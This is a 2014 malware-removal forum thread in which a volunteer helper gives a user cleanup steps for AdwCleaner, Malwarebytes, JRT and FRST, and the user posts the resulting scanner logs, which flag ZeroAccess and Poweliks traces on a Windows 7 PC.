Description: ID: 6, Application Name: Microsoft Office Outlook, Application Version: 12.0.6607.1000, Microsoft Office Version: 12.0.6612.1000. This session lasted 9 seconds with 0 seconds of active time.  This session ended with a crash.

==================== Memory info ===========================

Processor: Intel® Core™ i7 CPU 920 @ 2.67GHz
Percentage of memory in use: 20%
Total physical RAM: 12279.16 MB
Available physical RAM: 9754.61 MB
Total Pagefile: 24556.5 MB
Available Pagefile: 21190.34 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: (HP) (Fixed) (Total:100.18 GB) (Free:19.91 GB) NTFS
Drive d: (FACTORY_IMAGE) (Fixed) (Total:12.46 GB) (Free:2.25 GB) NTFS ==>[System with boot components (obtained from reading drive)]
Drive e: (HP 2) (Fixed) (Total:120.14 GB) (Free:119.68 GB) NTFS
Drive m: (2TB 1) (Fixed) (Total:465.75 GB) (Free:183.15 GB) NTFS
Drive n: (2TB 2) (Fixed) (Total:465.75 GB) (Free:48.78 GB) NTFS
Drive o: (2TB 3) (Fixed) (Total:465.75 GB) (Free:188.4 GB) NTFS
Drive p: (2TB 4) (Fixed) (Total:465.77 GB) (Free:311 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 6C98FF9C)
Partition 1: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=465.8 GB) - (Type=OF Extended)

========================================================
Disk: 1 (Size: 232.9 GB) (Disk ID: CE79DF4F)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=100.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=120.1 GB) - (Type=OF Extended)
Partition 4: (Not Active) - (Size=12.5 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 20 October 2014 - 01:03 PM

Running from E:\

Why?

I need the logs of TDSSKILLER and RogueKiller ....

Step 1: Adwarecleaner

Please download AdwCleaner (by Xplode) from the link below and save it to your Desktop:

Download Mirror #1
  • Right-click on AdwCleaner.exe and select Run as administrator. (If you have Windows XP the just run it)
  • Click Scan and let the scan run.
  • When it finishes, click Clean, following the on screen prompts
  • After your computer reboots, a log will open. Please Copy (Ctrl+C) and Paste (Ctrl+V) this into your next post.
Note: The log can also be found in here: C:\AdwCleaner\

Step 2: Malwarebytes

Please download Malwarebytes Anti-Malware to your desktop Install the progamme and select update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits

MBAMsettings.JPG

Go back to the Dashboard and select Scan Now

MBAMScan.JPG

If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.

MBAMReboot.JPG

MBAMLog.JPG

On completion of the scan (or after the reboot) select View Detailed Log
Select Export > Select text file and save to the desktop
Attach/Post that log

Step 3: Junkware Removal Tool

thisisujrt.gif  Please download Junkware Removal Tool to your desktop.
  • Shut down your protection software now to avoid potential conflicts.
  • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
  • Post the contents of JRT.txt into your next message.
Step 4: FRST Scan
  • Run FRST. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • Click Scan to start FRST.
  • When FRST finishes scanning, a log, FRST.txt, will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of this log into your next post please.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#5 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 20 October 2014 - 05:33 PM

Running from E:\

Because it was empty.  I created a new user account that seemed clean, studied the threads with similar problem like mine,  downloaded everything that I expected to need, and stuck it in the empty E:\.  I then found and removed Trojan.Sirede.C and Backdoor.OAccess. But Obviously Backdoor had already took hold. I have rkill logs from before and after if that would help.

 

Here are the current logs for RougeKiller. 

 

TDSSKiller says 0 threats found but I cannot figure out how to capture or copy that report.  Copy-Paste won't work.

 

Will be back after running the rest of this.

 

Thanks

Jim

 

--------------------

 

RogueKiller V10.0.2.0 [Oct 16 2014] by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/softwares/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : JP [Administrator]
Mode : Scan -- Date : 10/20/2014  17:19:55

¤¤¤ Processes : 1 ¤¤¤
[Suspicious.Path] (SVC) ALSysIO -- \??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys[x] -> Stopped

¤¤¤ Registry : 25 ¤¤¤
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ALSysIO (\??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys) -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\ALSysIO (\??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys) -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\ALSysIO (\??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys) -> Found
[Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet003\Services\ALSysIO (\??\C:\Users\JP\AppData\Local\Temp\ALSysIO64.sys) -> Found
[PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Internet Explorer\Main | Start Page : https://duckduckgo.com/  -> Found
[PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Internet Explorer\Main | Start Page : https://duckduckgo.com/  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet003\Services\Tcpip\Parameters | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{00CC7F36-8FA0-4ED7-B2E6-6583421FF144} | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet002\Services\Tcpip\Parameters\Interfaces\{00CC7F36-8FA0-4ED7-B2E6-6583421FF144} | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet003\Services\Tcpip\Parameters\Interfaces\{00CC7F36-8FA0-4ED7-B2E6-6583421FF144} | DhcpNameServer : 8.8.8.8 24.178.162.3 24.247.15.53  -> Found
[PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0  -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_ShowMyGames : 0  -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\ClassicStartMenu | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {59031a47-3f72-44a7-89c5-5595fe6b30ee} : 1  -> Found
[PUM.DesktopIcons] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[PUM.DesktopIcons] (X86) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel | {20D04FE0-3AEA-1069-A2D8-08002B30309D} : 1  -> Found
[Tr.Poweliks] (X64) HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\LocalServer32 -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 3 ¤¤¤
[ZeroAccess][File] @ -- C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@ -> Found
[ZeroAccess][Folder] L -- C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\L -> Found
[ZeroAccess][Folder] U -- C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\U -> Found

¤¤¤ Hosts File : 1 ¤¤¤
[C:\Windows\System32\drivers\etc\hosts] 127.0.0.1 localhost

¤¤¤ Antirootkit : 2 (Driver: Not loaded [0xc000036b]) ¤¤¤
[IAT:Addr] (iexplore.exe @ POWRPROF.dll) SETUPAPI.dll - CM_Get_DevNode_Status : C:\Windows\syswow64\CFGMGR32.dll @ 0x766c7498
[IAT:Addr] (iexplore.exe @ POWRPROF.dll) SETUPAPI.dll - CM_Get_Device_IDW : C:\Windows\syswow64\CFGMGR32.dll @ 0x766c86ef

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0:  +++++
--- User ---
[MBR] 6509a2393e3646b6e9b410946dd7d68a
[BSP] e0d495c3414ef7a8ecb7f01819d8cfbf : Windows Vista/7/8 MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 476925 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 976744448 | Size: 476925 MB
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1953486848 | Size: 476925 MB
3 - [XXXXXX] EXTEN-LBA (0xf) [VISIBLE] Offset (sectors): -1364738048 | Size: 476952 MB
User = LL1 ... OK
Error reading LL2 MBR! ([1] Incorrect function. )

+++++ PhysicalDrive1:  +++++
--- User ---
[MBR] b0cad70222274b0c308b904af5e37ca4
[BSP] 3c426ca8b2a7f6686f5ae7ee770c5a73 : Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 102587 MB
2 - [XXXXXX] EXTEN-LBA (0xf) [VISIBLE] Offset (sectors): 210307072 | Size: 123027 MB
3 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 462267777 | Size: 12756 MB
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive3:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive4:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive5:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

+++++ PhysicalDrive6:  +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

============================================
RKreport_DEL_10172014_222738.log - RKreport_SCN_10172014_222425.log - RKreport_SCN_10172014_223001.log



#6 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 20 October 2014 - 06:29 PM

Here are the logs from ADWc, MBAM, JRT, and FRST.

 

-------------------------------------

 

# AdwCleaner v4.000 - Report created 20/10/2014 at 17:45:24
# DB v
# Updated 12/10/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
# Username : JP - JIM-PC
# Running from : E:\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

[x] Not Deleted : C:\Users\JP\AppData\Roaming\AVG Secure Search
[x] Not Deleted : C:\Users\JP\AppData\LocalLow\AVG Security Toolbar
Folder Deleted : C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Free Ride Games
Folder Deleted : C:\Program Files (x86)\GreenTree Applications

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\apnstub_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\AskInstallChecker-1_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\AskInstallChecker-1_RASMANCS
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\HPSF_Tasks_RASAPI32
Key Deleted : HKLM\SOFTWARE\Microsoft\Tracing\HPSF_Tasks_RASMANCS
Key Deleted : HKLM\SOFTWARE\Classes\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{CC5AD34C-6F10-4CB3-B74A-C2DD4D5060A3}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{DE9028D0-5FFA-4E69-94E3-89EE8741F468}
Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BCFF5F55-6F44-11D2-86F8-00104B265ED5}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{13ABD093-D46F-40DF-A608-47E162EC799D}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}
Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{9C049BA6-EA47-4AC3-AED6-A66D8DC9E1D8}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{95B7759C-8C7F-4BF1-B163-73684A933233}
Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{F25AF245-4A81-40DC-92F9-E9021F207706}
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{CCC7A320-B3CA-4199-B1A6-9F516DD69829}]
Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{E7DF6BFF-55A5-4EB7-A673-4ED3E9456D39}]
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{03E2A1F3-4402-4121-8B35-733216D61217}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{9E3B11F6-4179-4603-A71B-A55F4BCB0BEC}
Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BCFF5F55-6F44-11D2-86F8-00104B265ED5}
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe]
Value Deleted : HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe]
Key Deleted : HKCU\Software\MGShareware
Key Deleted : HKLM\SOFTWARE\Conduit
Key Deleted : HKLM\SOFTWARE\MGShareware

***** [ Browsers ] *****

-\\ Internet Explorer v9.0.8112.16526

-\\ Google Chrome v

*************************

AdwCleaner[R0].txt - [4060 octets] - [20/10/2014 17:38:50]
AdwCleaner[S0].txt - [3987 octets] - [20/10/2014 17:45:24]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [4047 octets] ##########

 

 

--------------------------

 

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 10/20/2014
Scan Time: 5:55:00 PM
Logfile: MBAM102014 18_10.TXT
Administrator: No

Version: 2.00.3.1025
Malware Database: v2014.10.20.07
Rootkit Database: v2014.10.17.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: JP

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 337610
Time Elapsed: 14 min, 17 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Warn
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

 

---------------------------

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.3.3 (10.14.2014:1)
OS: Windows 7 Professional x64
Ran by JP on Mon 10/20/2014 at 18:13:08.35
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

~~~ Services

 

~~~ Registry Values

Successfully repaired: [Registry Value] HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-18\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-19\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-20\Software\Microsoft\Internet Explorer\Main\\Start Page
Successfully repaired: [Registry Value] HKEY_USERS\S-1-5-21-2804656215-4255892301-2232998820-1003\Software\Microsoft\Internet Explorer\Main\\Start Page

 

~~~ Registry Keys

Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\msntask_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\msntask_RASMANCS
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\msntask_RASAPI32
Successfully deleted: [Registry Key] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Tracing\msntask_RASMANCS
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Successfully deleted: [Registry Key - Orphan] HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}
Successfully deleted: [Registry Key - Orphan] HKEY_CLASSES_ROOT\CLSID\{E76FD755-C1BA-4DCB-9F13-99BD91223ADE}

 

~~~ Files

 

~~~ Folders

Successfully deleted: [Folder] "C:\ProgramData\freerip"
Successfully deleted: [Folder] "C:\Program Files (x86)\freerip3"
Successfully deleted: [Empty Folder] C:\Users\JP\appdata\local\{f74e7a95-1d32-0366-baea-5ce012d107ec}

 

~~~ Event Viewer Logs were cleared

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Mon 10/20/2014 at 18:16:47.65
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

-------------------------------

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by JP (administrator) on JIM-PC on 20-10-2014 18:18:56
Running from E:\
Loaded Profile: JP (Available profiles: JP & JR)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
(ANTS) C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe
() C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
() C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneCmd.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Speedbit Ltd.) C:\Program Files (x86)\DAP\DAP.exe
() C:\Program Files\Core Temp\Core Temp.exe
(CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe
(Novatel Wireless Inc.) C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Hewlett-Packard) C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe
(Research In Motion Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(CANON INC.) C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgui.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\CTxfispi.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-07-08] ()
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [499608 2011-06-16] (Adobe Systems Incorporated)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2779024 2011-03-14] (CANON INC.)
HKLM-x32\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM-x32\...\Run: [UpdatePRCShortCut] => C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe [222504 2009-05-20] (CyberLink Corp.)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284696 2010-03-03] (Intel Corporation)
HKLM-x32\...\Run: [57xxSteelVine] => C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe [1720320 2007-08-20] ()
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [RIMBBLaunchAgent.exe] => C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe [90448 2011-09-01] (Research In Motion Limited)
HKLM-x32\...\Run: [AMD AVT] => C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe [10752 2012-01-31] ()
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [641664 2012-04-06] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [CTxfiHlp] => CTXFIHLP.EXE
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [253816 2013-03-12] (Oracle Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
